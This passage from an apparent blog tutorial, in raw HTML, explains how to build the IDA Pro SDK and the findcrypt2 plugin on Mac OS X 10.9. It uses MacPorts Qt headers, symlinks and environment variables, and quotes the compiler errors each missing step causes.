<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(Please note that compiling “stock” Qt requires LLVM - and not GNU GCC - to be the default </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> alias).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There is no hope of getting an official fix, as this OS version is unsupported:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">../../include/QtCore/../../src/corelib/global/qglobal.h:331:6: warning: "This version of Mac OS X is unsupported" [-W#warnings]</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"># warning "This version of Mac OS X is unsupported"</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Therefore the best way to go is to install </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from MacPorts (do </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">not</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> use </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac-devel</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, which is older and seemingly unmaintained). Note: at this point, you can grab a second coffee, as compiling Qt could also take </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hours</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At the time of writing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is a port of Qt version 4.8.5 - close enough to do the job.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Installing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qt4-mac</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is enough to get all the required headers, but will not produce Qt libraries that could replace those bundled with IDA, as those libraries were generated specifying a different namespace at compile time.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It should be possible to edit the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Portfile</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and add the extra required option (</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-qtnamespace QT</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), but that would probably break all other Qt-dependent binaries in MacPorts - so I did not bother to explore that option.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At this point we end up in the error-prone, but working, situation of having MacPorts Qt 4.8.5 (patched) headers in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/opt/local</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and IDA's prebuilt Qt 4.8.4 libraries in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/IDA Pro/idaq.app/Contents/Frameworks</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ls</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QtCore.framework<span class="Apple-tab-span" style="white-space: pre;"> </span>QtGui.framework<span class="Apple-tab-span" style="white-space: pre;"> </span>QtHelp.framework<span class="Apple-tab-span" style="white-space: pre;"> </span>QtNetwork.framework<span class="Apple-tab-span" style="white-space: pre;"> </span>QtSql.framework<span class="Apple-tab-span" style="white-space: pre;"> </span>QtXml.framework<span class="Apple-tab-span" style="white-space: pre;"> </span>libQtCLucene.4.dylib</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK “makefiles” have hardcoded references to the following include paths:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I../../include/</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include/QtCore"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include/QtGui"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include/QtXml"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I"/Users/Shared/Qt/4.8.4/include"</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">-I.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You can choose to edit the makefiles. I chose the other way around: creating a lot of symlinks.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ mkdir /Users/Shared/Qt/</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ mkdir /Users/Shared/Qt/4.8.4/</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ln -s /opt/local/include/ /Users/Shared/Qt/4.8.4/include</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to symlink the include directory will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">qwindow.cpp:10:19: fatal error: QWidget: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">compilation terminated.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ln -s /opt/local/bin/ /Users/Shared/Qt/4.8.4/bin</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to symlink the bin directory will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/bin/sh: /Users/Shared/Qt/4.8.4/bin/moc: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[2]: *** [obj/x86_mac_gcc_32/moc_myactions.o32] Error 127</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[1]: *** [qwindow] Error 1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make: *** [plugins] Error 1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ ln -s /Applications/IDA\ Pro/idaq.app/Contents/Frameworks/ /Users/Shared/Qt/4.8.4/lib</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to symlink the lib directory will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g++: error: /Users/Shared/Qt/4.8.4/lib/QtXml.framework/QtXml: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g++: error: /Users/Shared/Qt/4.8.4/lib/QtGui.framework/QtGui: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g++: error: /Users/Shared/Qt/4.8.4/lib/QtCore.framework/QtCore: No such file or directory</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[2]: *** [../../bin/plugins/qwindow.pmc] Error 1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make[1]: *** [qwindow] Error 1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">make: *** [plugins] Error 1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Grabbing IDA libraries</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1. Unzip IDA SDK archive. For the rest of this post, I will assume it has been unzipped into its default location: </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/idasdk65</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(Documentation sometimes refers to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">idasrc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instead, but unfortunately we do not have a copy of this one :)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2. The IDA author usually recommends putting a full copy of IDA under </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/idasdk65/bin</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">However, it is enough to copy or symlink the following library from the IDA installation directory:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/IDA Pro/idaq.app/Contents/MacOS/libida.dylib</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Failure to do so will result in the following error message at compile-time:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ld: library not found for -lida</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">collect2: error: ld returned 1 exit status</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you would like to compile 64-bit plugins, also grab the following library:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/IDA Pro/idaq.app/Contents/MacOS/libida64.dylib</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1. As stated in the documentation, export the following environment variables:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ export __MAC__=1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ export MACSDK=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Remember that path? You got it from:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ xcrun --sdk macosx --show-sdk-path</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2. Run the compilation script:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ chmod 755 bin/idamake.pl</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ bin/idamake.pl</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If the latter command did not return any error, you are all set!</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling a plugin</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s take findcrypt2 plugin as an example.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling 32-bit Mac OS X version:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ cd ~/idasdk65/plugins/findcrypt2</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ make</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ file ~/idasdk65/bin/plugins/findcrypt.pmc </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/Users/newsoft/idasdk65/bin/plugins/findcrypt.pmc: Mach-O dynamically linked shared library i386</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
